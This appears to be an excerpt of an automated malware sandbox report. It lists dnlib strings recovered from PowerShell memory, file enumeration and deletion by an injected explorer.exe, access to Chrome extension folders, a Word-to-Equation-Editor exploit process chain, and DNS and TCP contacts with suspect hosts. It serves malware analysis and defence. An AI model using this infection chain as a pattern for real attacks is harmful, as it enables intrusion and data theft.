            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_000C1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_000C3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_000C2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 21_2_0008255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_000815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_000814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_000813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose
            Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
            Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
            Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
            Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
            Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\

            Software Vulnerabilities

            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: global traffic | DNS query: name: ia803104.us.archive.org
            Source: global traffic | DNS query: name: prolinice.ga (this query appears 9 times in the report)
            Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443 (this client-to-server row appears 279 times in the report)
            Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
            Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 23.94.148.16:80
            Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 23.94.148.16:80
